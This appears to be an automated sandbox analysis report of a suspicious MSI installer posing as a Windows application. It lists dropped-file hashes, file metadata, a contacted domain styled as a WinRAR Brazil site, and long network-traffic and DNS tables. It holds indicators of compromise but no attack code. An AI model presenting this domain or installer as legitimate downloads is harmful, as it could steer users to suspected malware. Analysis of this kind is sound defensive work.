                                                                      SHA-256:40CFF875427762F3B66DAD7B3EA756CAEA8175D548E9DC10D7A4F651675617E6
                                                                      SHA-512:164AFFEA78272C47E57F375BE22D789FBCC3A1B711B250CEDC29BE129AC9596067013748FE39FA4AE3D2CB2BE0310C58E2149F6C127847FDE5E62185B5FAEE64
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):32768
                                                                      Entropy (8bit):1.1980348506566416
                                                                      Encrypted:false
                                                                      SSDEEP:48:3nQuGO+CFXJpT5BBf7J5rISCrKAECiCyjMHoRrISCrAT:XQMRT/57J1IrREC0M2Ir
                                                                      MD5:DDDA60A42D496F3D8F7601D55D8196E6
                                                                      SHA1:39D9AA045B72F48DE12B5DEAF8295F0C72484F65
                                                                      SHA-256:40CFF875427762F3B66DAD7B3EA756CAEA8175D548E9DC10D7A4F651675617E6
                                                                      SHA-512:164AFFEA78272C47E57F375BE22D789FBCC3A1B711B250CEDC29BE129AC9596067013748FE39FA4AE3D2CB2BE0310C58E2149F6C127847FDE5E62185B5FAEE64
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:HTML document, ASCII text
                                                                      Category:downloaded
                                                                      Size (bytes):287
                                                                      Entropy (8bit):5.220042863398179
                                                                      Encrypted:false
                                                                      SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIR+kn52LIK4KBFm8oD:J0+oxBeRmR9etdzRxGezH0q5eIK4b8+
                                                                      MD5:836739B37BE8A4CCF3678198795D9AA3
                                                                      SHA1:7B61AD8A96587952E97CCF69A36BD56F8FCE9A3D
                                                                      SHA-256:852286190A46CFA9783E8FDA867505A3C026A83198055D0EA287A42129FBF3E1
                                                                      SHA-512:99D3052415141F2E6FA818AE992556FD119F213CDB0EDD5B66809FC614A339346E50BE13AE68E46E0BB146909F3DFAD285484A1C3543357BE5AE313B8150B97D
                                                                      Malicious:false
                                                                      URL:https://winrarbrasil.from-mn.com/favicon.ico
                                                                      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.41 (Ubuntu) Server at winrarbrasil.from-mn.com Port 443</address>.</body></html>.
                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {A964743B-CAFF-41FA-9500-18A10960F691}, Number of Words: 10, Subject: Aplicativo Windows, Author: Microsoft, Name of Creating Application: Aplicativo Windows, Template: ;1046, Comments: Aplicativo Windows, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu May 30 18:43:02 2024, Number of Pages: 200
                                                                      Entropy (8bit):7.980096046762622
                                                                      TrID:
                                                                      • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                      • Microsoft Windows Installer (60509/1) 46.00%
                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                      File name:CrzA2u67LQ.msi
                                                                      File size:31'430'144 bytes
                                                                      MD5:41eed8b68bb6ddf7bdd73d285109e460
                                                                      SHA1:6a83946536e41d65d8f52f8222a3235c9877fcf3
                                                                      SHA256:a477e01f4afeaee40323a6981773ab20f7405c013f6a0398c9126e73d057616a
                                                                      SHA512:86c89a543b15d57f68852189c488f5c806841d6f4947f4b30b4eddc76a19eb9b00675b9b6b7a781457010a368daf23760235babf6bcb1281b98cdfcc59e1844d
                                                                      SSDEEP:786432:2n1stHfbfy4zTE8R0BPtznQ6rHSVx7Z7hSCyx/suqfh:5HfO4zTB8zQ6bSVx7IUu
                                                                      TLSH:0D673325B7C7C532C95D0137AD69FE2E1479BEA3473001E7B7E57D6E88B08C26271A82
                                                                      File Content Preview:........................>.......................................................G.......c.......v...............................P...Q...R...S...T...U...V...W...X..............................................................................................
                                                                      Icon Hash:2d2e3797b32b2b99
                                                                      Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                                                      Jun 1, 2024 19:04:38.819961071 CEST  49675        443        192.168.2.4      173.222.162.32
                                                                      Jun 1, 2024 19:04:45.736694098 CEST  443          49730      173.222.162.32   192.168.2.4
                                                                      Jun 1, 2024 19:04:45.736839056 CEST  49730        443        192.168.2.4      173.222.162.32
                                                                      Jun 1, 2024 19:04:46.084199905 CEST  49735        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:46.084253073 CEST  443          49735      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:46.084342003 CEST  49735        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:46.086628914 CEST  49736        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:46.086638927 CEST  443          49736      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:46.086843014 CEST  49736        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:46.087846994 CEST  49736        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:46.087846994 CEST  49735        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:46.087862968 CEST  443          49736      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:46.087894917 CEST  443          49735      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:46.928522110 CEST  443          49735      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:46.930119038 CEST  443          49736      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:46.943495035 CEST  49735        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:46.943512917 CEST  443          49735      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:46.944746971 CEST  443          49735      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:46.944816113 CEST  49735        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:46.947352886 CEST  49736        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:46.947377920 CEST  443          49736      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:46.948551893 CEST  443          49736      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:46.948606014 CEST  49736        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:46.948887110 CEST  49735        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:46.948982000 CEST  443          49735      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:46.949214935 CEST  49736        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:46.949284077 CEST  443          49736      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:46.949654102 CEST  49735        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:46.949665070 CEST  443          49735      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:46.992535114 CEST  49735        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:47.117995977 CEST  49736        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:47.118021011 CEST  443          49736      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:47.222798109 CEST  443          49735      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:47.223735094 CEST  443          49735      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:47.223782063 CEST  49735        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:47.228806973 CEST  49736        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:47.255935907 CEST  49735        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:47.255971909 CEST  443          49735      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:47.255983114 CEST  49735        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:47.256021976 CEST  49735        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:47.394398928 CEST  49736        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:47.436495066 CEST  443          49736      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:47.657787085 CEST  443          49736      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:47.657862902 CEST  443          49736      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:47.657954931 CEST  49736        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:47.833710909 CEST  49736        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:04:47.833750010 CEST  443          49736      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:04:49.399331093 CEST  49739        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:04:49.399379015 CEST  443          49739      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:04:49.399476051 CEST  49739        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:04:49.399753094 CEST  49739        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:04:49.399765968 CEST  443          49739      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:04:50.255803108 CEST  443          49739      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:04:50.258600950 CEST  49739        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:04:50.258627892 CEST  443          49739      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:04:50.259773016 CEST  443          49739      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:04:50.260298014 CEST  49739        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:04:50.261769056 CEST  49739        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:04:50.261866093 CEST  443          49739      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:04:50.429677010 CEST  49739        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:04:50.429713964 CEST  443          49739      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:04:50.615514040 CEST  49739        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:04:59.775219917 CEST  49730        443        192.168.2.4      173.222.162.32
                                                                      Jun 1, 2024 19:04:59.780267000 CEST  443          49730      173.222.162.32   192.168.2.4
                                                                      Jun 1, 2024 19:05:00.240571022 CEST  443          49739      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:05:00.240650892 CEST  443          49739      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:05:00.240693092 CEST  49739        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:05:05.350887060 CEST  49739        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:05:05.350935936 CEST  443          49739      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:05:09.985872984 CEST  49723        80         192.168.2.4      93.184.221.240
                                                                      Jun 1, 2024 19:05:09.991601944 CEST  80           49723      93.184.221.240   192.168.2.4
                                                                      Jun 1, 2024 19:05:09.991672993 CEST  49723        80         192.168.2.4      93.184.221.240
                                                                      Jun 1, 2024 19:05:11.856524944 CEST  49745        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:11.856558084 CEST  443          49745      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:11.856638908 CEST  49745        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:11.856805086 CEST  49746        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:11.856812954 CEST  443          49746      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:11.856862068 CEST  49746        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:11.857105970 CEST  49745        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:11.857110977 CEST  443          49745      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:11.857286930 CEST  49746        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:11.857291937 CEST  443          49746      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:12.703749895 CEST  443          49746      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:12.703823090 CEST  443          49745      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:12.714931011 CEST  49746        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:12.714963913 CEST  443          49746      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:12.715500116 CEST  443          49746      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:12.717704058 CEST  49745        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:12.717720032 CEST  443          49745      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:12.718291998 CEST  443          49745      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:12.812383890 CEST  49746        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:12.812608957 CEST  443          49746      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:12.812791109 CEST  49745        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:12.812971115 CEST  443          49745      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:12.813698053 CEST  49746        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:12.856509924 CEST  443          49746      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:12.933296919 CEST  49745        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:13.098460913 CEST  443          49746      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:13.098835945 CEST  443          49746      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:13.098901987 CEST  49746        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:13.212802887 CEST  49724        80         192.168.2.4      93.184.221.240
                                                                      Jun 1, 2024 19:05:13.218193054 CEST  80           49724      93.184.221.240   192.168.2.4
                                                                      Jun 1, 2024 19:05:13.218353987 CEST  49724        80         192.168.2.4      93.184.221.240
                                                                      Jun 1, 2024 19:05:13.219713926 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:13.219774961 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:13.219909906 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:13.221250057 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:13.221275091 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:13.343009949 CEST  49746        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:13.343043089 CEST  443          49746      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:14.117250919 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:14.117316008 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:14.207367897 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:14.207401037 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:14.221446037 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:14.303340912 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:15.040211916 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:15.084505081 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:15.499528885 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:15.499593973 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:15.499615908 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:15.499639988 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:15.499659061 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:15.499671936 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:15.499680996 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:15.499687910 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:15.499691963 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:15.499712944 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:15.499730110 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:15.499731064 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:15.499754906 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:15.499762058 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:15.499769926 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:15.499931097 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:15.499984026 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:15.499990940 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:15.500112057 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:15.500155926 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:15.521392107 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:15.521406889 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:15.521423101 CEST  49747        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:15.521429062 CEST  443          49747      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:32.969974041 CEST  443          49745      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:32.970060110 CEST  443          49745      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:32.970102072 CEST  49745        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:33.789696932 CEST  49745        443        192.168.2.4      45.90.123.184
                                                                      Jun 1, 2024 19:05:33.789729118 CEST  443          49745      45.90.123.184    192.168.2.4
                                                                      Jun 1, 2024 19:05:49.448507071 CEST  49752        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:05:49.448551893 CEST  443          49752      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:05:49.448693991 CEST  49752        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:05:49.449331999 CEST  49752        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:05:49.449347019 CEST  443          49752      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:05:50.303205013 CEST  443          49752      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:05:50.349622011 CEST  49752        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:05:50.353286982 CEST  49752        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:05:50.353295088 CEST  443          49752      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:05:50.353849888 CEST  443          49752      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:05:50.376013994 CEST  49752        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:05:50.376177073 CEST  443          49752      172.217.18.4     192.168.2.4
                                                                      Jun 1, 2024 19:05:50.552400112 CEST  49752        443        192.168.2.4      172.217.18.4
                                                                      Jun 1, 2024 19:05:51.802010059 CEST  49753        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:51.802052975 CEST  443          49753      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:51.802112103 CEST  49753        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:51.802453041 CEST  49753        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:51.802465916 CEST  443          49753      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:52.690184116 CEST  443          49753      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:52.690308094 CEST  49753        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:52.698635101 CEST  49753        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:52.698656082 CEST  443          49753      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:52.698890924 CEST  443          49753      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:52.707422972 CEST  49753        443        192.168.2.4      20.114.59.183
                                                                      Jun 1, 2024 19:05:52.748503923 CEST  443          49753      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:52.997056007 CEST  443          49753      20.114.59.183    192.168.2.4
                                                                      Jun 1, 2024 19:05:52.997086048 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.997103930 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.997159004 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:52.997173071 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.997215033 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:52.998141050 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.998186111 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.998209000 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:52.998217106 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.998236895 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.998305082 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:53.010322094 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:53.010339022 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:53.010371923 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:53.010377884 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:06:00.316391945 CEST44349752172.217.18.4192.168.2.4
                                                                      Jun 1, 2024 19:06:00.316478014 CEST44349752172.217.18.4192.168.2.4
                                                                      Jun 1, 2024 19:06:00.316580057 CEST49752443192.168.2.4172.217.18.4
                                                                      Jun 1, 2024 19:06:01.776881933 CEST49752443192.168.2.4172.217.18.4
                                                                      Jun 1, 2024 19:06:01.776909113 CEST44349752172.217.18.4192.168.2.4
                                                                      Jun 1, 2024 19:06:49.514484882 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:06:49.514545918 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:06:49.514607906 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:06:49.518752098 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:06:49.518783092 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:06:50.364306927 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:06:50.364680052 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:06:50.364705086 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:06:50.365017891 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:06:50.365322113 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:06:50.365372896 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:06:50.412832975 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:07:00.389358997 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:07:00.389425039 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:07:00.389467001 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:07:01.840553045 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:07:01.840610027 CEST44349756216.58.206.68192.168.2.4
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jun 1, 2024 19:04:45.824647903 CEST5985453192.168.2.41.1.1.1
                                                                      Jun 1, 2024 19:04:45.824785948 CEST5549253192.168.2.41.1.1.1
                                                                      Jun 1, 2024 19:04:45.831521988 CEST53580441.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:04:45.979582071 CEST53598541.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:04:46.001344919 CEST53602761.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:04:46.250494003 CEST53554921.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:04:47.661015987 CEST53564411.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:04:49.382695913 CEST6011753192.168.2.41.1.1.1
                                                                      Jun 1, 2024 19:04:49.382900000 CEST5436353192.168.2.41.1.1.1
                                                                      Jun 1, 2024 19:04:49.389683008 CEST53601171.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:04:49.390152931 CEST53543631.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:04:58.250770092 CEST138138192.168.2.4192.168.2.255
                                                                      Jun 1, 2024 19:05:05.359659910 CEST53579111.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:05:25.202254057 CEST53640161.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:05:45.017178059 CEST53653821.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:05:48.233963966 CEST53534091.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:06:14.252450943 CEST53594181.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:06:49.502377033 CEST5567053192.168.2.41.1.1.1
                                                                      Jun 1, 2024 19:06:49.502505064 CEST5595553192.168.2.41.1.1.1
                                                                      Jun 1, 2024 19:06:49.509762049 CEST53556701.1.1.1192.168.2.4
